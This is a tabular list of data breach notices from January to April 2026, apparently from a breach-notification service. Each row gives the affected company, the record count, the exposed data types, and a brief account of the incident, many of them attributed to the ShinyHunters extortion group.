| 20.04.2026 - ADT | 5.488.888 records leaked | Dates of birth, Email addresses, Names, Partial government issued IDs, Phone numbers, Physical addresses |
| In April 2026, home security firm ADT confirmed a data breach by ShinyHunters, which listed the company on its website as part of a "pay or leak" extortion attempt. The breach impacted 5.5M unique email addresses along with names, phone numbers and physical addresses. ADT also advised that "in a small percentage of cases, dates of birth and the last four digits of Social Security numbers or Tax IDs were included" and that it had contacted all affected people. | | |
| 20.04.2026 - Aman | 215.563 records leaked | Dates of birth, Email addresses, Genders, Language preferences, Names, Nationalities, Phone numbers, Physical addresses, Spouses names, VIP statuses |
| In April 2026, the ultra-luxury hotel brand Aman was named by ShinyHunters as the target of a "pay or leak" extortion campaign, with the data allegedly obtained from their Salesforce CRM. The data was subsequently leaked publicly and contained over 200k unique email addresses. Whilst not present on all records, the data also included genders, physical addresses, phone numbers, nationalities, dates of birth, spouse names and VIP status codes. | | |
| 20.04.2026 - Canada Life | 237.810 records leaked | Email addresses, Job titles, Names, Phone numbers, Physical addresses, Salutations, Support tickets |
| In April 2026, Canada Life was the victim of a "pay or leak" extortion campaign by the ShinyHunters group. The group subsequently published the data, which contained over 200k unique email addresses along with names, phone numbers, physical addresses and, in some cases, customer support tickets. In their disclosure notice, Canada Life advised that "it is a small proportion of our customers who may have been impacted". In the wake of the incident, Canada Life also published an alert cautioning customers to be wary of phishing attacks, a pattern often seen after the public release of breached data. | | |
| 20.04.2026 - Pitney Bowes | 8.243.989 records leaked | Email addresses, Job titles, Names, Phone numbers, Physical addresses |
| In April 2026, the hacking collective ShinyHunters claimed to have obtained data from Pitney Bowes as part of a broader extortion campaign that also named several other organisations. After negotiations allegedly failed, the group publicly released the data, which included 8.2M unique email addresses, along with names, phone numbers and physical addresses. A subset of the data also included Pitney Bowes employee records with job titles. | | |
| 18.04.2026 - Carnival | 7.531.359 records leaked | Dates of birth, Email addresses, Genders, Geographic locations, Loyalty program details, Names, Salutations |
| In April 2026, the notorious hacking collective ShinyHunters claimed they had obtained a substantial volume of data belonging to the Carnival cruise operator and attempted to extort the organisation to prevent the data from being leaked. The following week, the group published the data publicly, which contained 8.7M records with 7.5M unique email addresses. The data contained fields indicating it related to the Mariner Society loyalty program run by Holland America, a cruise line brand under Carnival, and included names, dates of birth, genders and data relating to status within the loyalty program. Carnival acknowledged a phishing incident involving a single user account and advised they were working to better understand the scope of the unauthorised activity. | | |
| 15.04.2026 - Zara | 197.376 records leaked | Email addresses, Geographic locations, Purchases, Support tickets |
| In April 2026, the fashion brand Zara was among a number of organisations targeted by the ShinyHunters extortion group as part of their "pay or leak" campaign. The group claimed the breach was related to a compromise of the Anodot analytics platform and subsequently published a terabyte of data allegedly including 95M support ticket records. The data contained 197k unique email addresses alongside product SKUs, order IDs and the market the support ticket originated in. Zara's parent company Inditex advised that the incident didn't affect passwords or payment information. | | |
| 14.04.2026 - Abrigo | 711.099 records leaked | Email addresses, Employers, Job titles, Names, Phone numbers, Physical addresses |
| In April 2026, the fintech software company Abrigo was targeted in a "pay or leak" extortion attempt by the ShinyHunters group. Shortly after, data allegedly taken from the company's Salesforce instance was published publicly and contained over 700k unique email addresses belonging to both Abrigo staff and external contacts. Whilst separate from Abrigo's Salesforce compromise via the Drift application connector the previous year, the data fields described in that incident are consistent with the ShinyHunters data, namely that it was "business contact information" including "institution name, employee name, email addresses, and phone numbers". | | |
| 12.04.2026 - Marcus & Millichap | 1.837.078 records leaked | Email addresses, Employers, Job titles, Names, Phone numbers, Physical addresses |
| In April 2026, the commercial real estate brokerage firm Marcus & Millichap was named as one of multiple alleged victims of the ShinyHunters hacking and extortion group. Data alleged to have been obtained from the company was subsequently released publicly and included 1.8M unique email addresses, along with names, phone numbers and employment-related information including employer, job title and physical company address. In their disclosure notice, Marcus & Millichap advised that data which may have been accessed appeared limited to "company forms, templates, marketing materials, and general contact information". | | |
| 10.04.2026 - McGraw Hill | 13.500.136 records leaked | Email addresses, Names, Phone numbers, Physical addresses |
| In April 2026, education company McGraw Hill confirmed a data breach following an extortion attempt. Attributing it to a Salesforce misconfiguration, the company stated the incident exposed "a limited set of data from a webpage hosted by Salesforce on its platform". More than 100GB of data was later publicly distributed, containing 13.5M unique email addresses across multiple files, with additional fields such as name, physical address and phone number appearing inconsistently across some records. | | |
| 08.04.2026 - 7-Eleven | 185.256 records leaked | Dates of birth, Email addresses, Names, Phone numbers, Physical addresses |
| In April 2026, 7-Eleven was the victim of a "pay or leak" extortion campaign by ShinyHunters, with the data later published that month. The incident exposed 185k unique email addresses, along with names, physical addresses, dates of birth and phone numbers. A small number of records also contained additional exposed data fields. The company later advised the breach was limited to "certain 7-Eleven systems used to store franchisee documents", a statement consistent with the exposed data. | | |
| 07.04.2026 - My Lovely AI | 106.271 records leaked | Email addresses, Social media profiles |
| In April 2026, the NSFW AI girlfriend platform My Lovely AI suffered a data breach that exposed over 100k users. The data included user-created prompts and links to the resulting AI-generated images, along with a small number of Discord and X usernames. | | |
| 06.04.2026 - LegionProxy | 10.144 records leaked | Email addresses, Names, Passwords, Purchases |
| In April 2026, the commercial residential and ISP proxy network LegionProxy suffered a data breach. The incident exposed 10k email addresses, bcrypt password hashes, names and purchases. | | |
| 03.04.2026 - Amtrak | 2.147.679 records leaked | Email addresses, Names, Physical addresses, Support tickets |
| In April 2026, the hacking group ShinyHunters claimed they had breached Amtrak. The group typically compromises organisations' Salesforce instances before demanding a ransom and later, if not paid, dumping the data publicly. They subsequently published the alleged data, which contained over 2M unique email addresses along with names, physical addresses and customer support records. | | |
| 02.04.2026 - SongTrivia2 | 291.739 records leaked | Auth tokens, Avatars, Email addresses, Names, Passwords, Usernames |
| In April 2026, the music trivia platform SongTrivia2 suffered a data breach that was subsequently published to a public hacking forum. The data contained a total of 291k unique email addresses sourced from either Google OAuth logins or accounts created on the site, the latter also containing bcrypt password hashes. The data also included names, usernames and avatars. | | |
| 31.03.2026 - Hallmark | 1.736.520 records leaked | Email addresses, Names, Phone numbers, Physical addresses, Support tickets |
| In March 2026, Hallmark suffered an alleged breach and subsequent extortion after attackers gained access to data stored within Salesforce. The data was later published after the extortion deadline passed, exposing 1.7M unique email addresses across both Hallmark and the Hallmark+ streaming service, along with names, phone numbers, physical addresses and support tickets. | | |
| 27.03.2026 - ZenBusiness | 5.118.184 records leaked | Email addresses, Names, Phone numbers |
| In March 2026, the hacker and extortion group "ShinyHunters" claimed to have obtained a substantial corpus of data from ZenBusiness, a business formation and compliance platform. The group claimed the data had been exfiltrated from platforms including Snowflake, Mixpanel and Salesforce, and threatened to publish it if a ransom was not paid. The following month, after claiming payment had not been made, ShinyHunters publicly released the data. The collection amounted to many terabytes across thousands of files that appeared to originate from multiple systems and business functions, including leads, support records and other CRM-related data. The data contained approximately 5M unique email addresses, often accompanied by name and phone number depending on the source file. | | |
| 26.03.2026 - BreachForums Version 5 | 339.778 records leaked | Email addresses, Passwords, Usernames |
| In March 2026, a breach of one of the many iterations of the BreachForums hacking forum, known as "Version 5", was publicly disclosed. The incident exposed 340k unique email addresses along with usernames and argon2 password hashes. | | |
| 25.03.2026 - Addi | 34.532.941 records leaked | Age groups, Credit scores, Device information, Email addresses, Government issued IDs, Income levels, IP addresses, Latitude and longitude pairs, Names, Phone numbers, Physical addresses, Purchases, Socioeconomic levels |
| In March 2026, the Colombian fintech company Addi identified unauthorised activity on its platform and advised customers that "it is possible that your personal information may have been compromised". The "pay or leak" extortion group ShinyHunters subsequently claimed responsibility and published a large trove of personal data allegedly obtained from Addi. The data included 34M unique email addresses from credit scoring requests, credit bureau records, customer identity records and email validation logs. It also contained government issued IDs (Cédula de Ciudadanía), estimated income, socioeconomic levels, purchases and other credit-related data points. | | |
| 25.03.2026 - Sound Radix | 292.993 records leaked | Email addresses, Names, Passwords |
| In March 2026, the audio production tools company Sound Radix disclosed a data breach that they subsequently self-submitted to HIBP. The incident impacted 293k unique email addresses and names. Sound Radix advised that it is possible that additional data including hashed passwords may have been exposed, and that no financial or credit card information was impacted. | | |
| 13.03.2026 - Divine Skins | 105.814 records leaked | Email addresses, Purchases, Usernames |
| In March 2026, the League of Legends custom skins service Divine Skins suffered a data breach. The incident was disclosed via the service's Discord server, where Divine Skins stated that an unauthorised third party accessed part of its systems, deleted all skins from the database and exposed email addresses and usernames. The data also contained a history of purchases made by users. | | |
| 12.03.2026 - Crunchyroll | 1.195.684 records leaked | Email addresses |
| In March 2026, the anime streaming service Crunchyroll suffered a data breach alleged to have impacted 6.8M users. The exposed data is reported to have originated from the company's Zendesk support system, where "name, login name, email address, IP address, general geographic location and the contents of the support tickets" were exposed. A subset of 1.2M email addresses from an alleged 2M record dataset being sold was later provided to HIBP. | | |
| 08.03.2026 - Baydöner | 1.266.822 records leaked | Dates of birth, Email addresses, Genders, Geographic locations, Government issued IDs, Names, Passwords, Phone numbers, Purchases |
| In March 2026, the Turkish restaurant chain Baydöner suffered a data breach which was subsequently published to a public hacking forum. The incident exposed over 1.2M unique email addresses along with names, phone numbers, cities of residence and plaintext passwords. A small number of records also included Turkish national ID numbers and dates of birth. In their disclosure notice, Baydöner stated that payment and financial data was not affected. | | |
| 06.03.2026 - Aura | 903.080 records leaked | Customer service comments, Email addresses, IP addresses, Names, Phone numbers, Physical addresses |
| In March 2026, the online safety service Aura disclosed a data breach that exposed 900k unique email addresses. The data was primarily associated with a marketing tool from a previously acquired company, with fewer than 20k active Aura customers affected. Exposed data included names, phone numbers, physical and IP addresses, and customer service notes. Aura advised that no Social Security numbers, passwords or financial information were compromised. | | |
| 04.03.2026 - SUCCESS | 253.510 records leaked | Device information, Email addresses, IP addresses, Names, Passwords, Phone numbers, Physical addresses, Purchases |
| In March 2026, the personal development and achievement media brand SUCCESS suffered a data breach. The incident exposed 250k unique email addresses along with names, IP addresses, phone numbers and, for a limited number of staff members, bcrypt password hashes. The data also included orders containing physical addresses and the payment method used. In SUCCESS' disclosure notice, they advised their system had also been abused to send offensive newsletters with quotes falsely attributed to contributors. | | |
| 04.03.2026 - Woflow | 447.593 records leaked | Email addresses, Names, Phone numbers, Physical addresses |
| In March 2026, the AI-driven merchant data platform Woflow was named as a victim by the ShinyHunters data extortion group. The group subsequently published tens of thousands of files allegedly obtained from the company, comprising more than 2TB of data. The trove included hundreds of thousands of email addresses, names, phone numbers and physical addresses, with the data indicating it related to Woflow customers and, in turn, the customers of merchants using their platform. | | |
| 25.02.2026 - KomikoAI | 1.060.191 records leaked | AI prompts, Email addresses, Forum posts, Names |
| In February 2026, the AI-powered comic generation platform KomikoAI suffered a data breach. The incident exposed 1M unique email addresses along with names, user posts and the AI prompts used to generate content. The exposed data enables the mapping of individual AI prompts to specific email addresses. | | |
| 25.02.2026 - Lovora | 495.556 records leaked | Display names, Email addresses, Profile photos |
| In February 2026, the couples and relationship app Lovora allegedly suffered a data breach that exposed 496k unique email addresses. The data also included users' display names and profile photos, along with other personal information collected through use of the app. The app's maker, Plantake, did not respond to multiple attempts to contact them about the incident. | | |
| 17.02.2026 - Quitbro | 22.874 records leaked | Email addresses, Partial dates of birth, Usernames |
| In February 2026, the porn addiction app Quitbro allegedly suffered a data breach that exposed 23k unique email addresses. The data also included users' years of birth, responses to questions within the app and their last recorded relapse time. The app's maker, Plantake, did not respond to multiple attempts to contact them about the incident. | | |
| 14.02.2026 - CarGurus | 12.461.887 records leaked | Email addresses, IP addresses, Names, Phone numbers, Physical addresses |
| In February 2026, the automotive marketplace CarGurus was the target of a data breach attributed to the threat actor ShinyHunters. Following an attempted extortion, the data was published publicly and contained more than 12M email addresses across multiple files, including user account ID mappings, finance pre-qualification application data and dealer account and subscription information. Impacted data also included names, phone numbers, physical and IP addresses, and auto finance application outcomes. | | |
| 12.02.2026 - Odido | 6.077.025 records leaked | Bank account numbers, Customer service comments, Dates of birth, Driver's licenses, Email addresses, Genders, Government issued IDs, Names, Passport numbers, Phone numbers, Physical addresses |
| In February 2026, Dutch telco Odido was the victim of a data breach and subsequent extortion attempt. Shortly after, a total of 6M unique email addresses were published across four separate data releases over consecutive days. The exposed data includes names, physical addresses, phone numbers, bank account numbers, dates of birth, customer service notes and passport, driver's licence and European national ID numbers. Odido has published a disclosure notice including an FAQ to support affected customers. | | |
| 06.02.2026 - Toy Battles | 1.017 records leaked | Chat logs, Email addresses, IP addresses, Usernames |
| In February 2026, the online gaming community Toy Battles suffered a data breach. The incident exposed 1k unique email addresses alongside usernames, IP addresses and chat logs. Following the breach, Toy Battles self-submitted the data to Have I Been Pwned. | | |
| 30.01.2026 - Association Nationale des Premiers Secours | 5.600 records leaked | Dates of birth, Email addresses, Names, Places of birth, Salutations |
| In January 2026, a data breach impacting the French non-profit Association Nationale des Premiers Secours (ANPS) was posted to a hacking forum. The breach exposed 5.6k unique email addresses along with names, dates of birth and places of birth. ANPS self-submitted the data to HIBP and advised the incident was traced back to a legacy system and did not impact health data, financial information or passwords. | | |
| 30.01.2026 - Provecho | 712.904 records leaked | Email addresses, Usernames |
| In early 2026, data purportedly sourced from the recipe and meal planning service Provecho was alleged to have been obtained in a breach. The exposed data included 713k unique email addresses along with usernames and the creators each account holder followed. Provecho has been notified and is aware of the claims surrounding the incident. | | |
| 28.01.2026 - Figure | 967.178 records leaked | Dates of birth, Email addresses, Names, Phone numbers, Physical addresses |
| In February 2026, data obtained from the fintech lending platform Figure was publicly posted online. The exposed data, dating back to January 2026, contained over 900k unique email addresses along with names, phone numbers, physical addresses and dates of birth. Figure confirmed the incident and attributed it to a social engineering attack in which an employee was tricked into providing access. | | |
| 24.01.2026 - CarMax | 431.371 records leaked | Email addresses, Names, Phone numbers, Physical addresses |
| In January 2026, data allegedly sourced from US automotive retailer CarMax was published online following a failed extortion attempt. The data included 431k unique email addresses along with names, phone numbers and physical addresses. | | |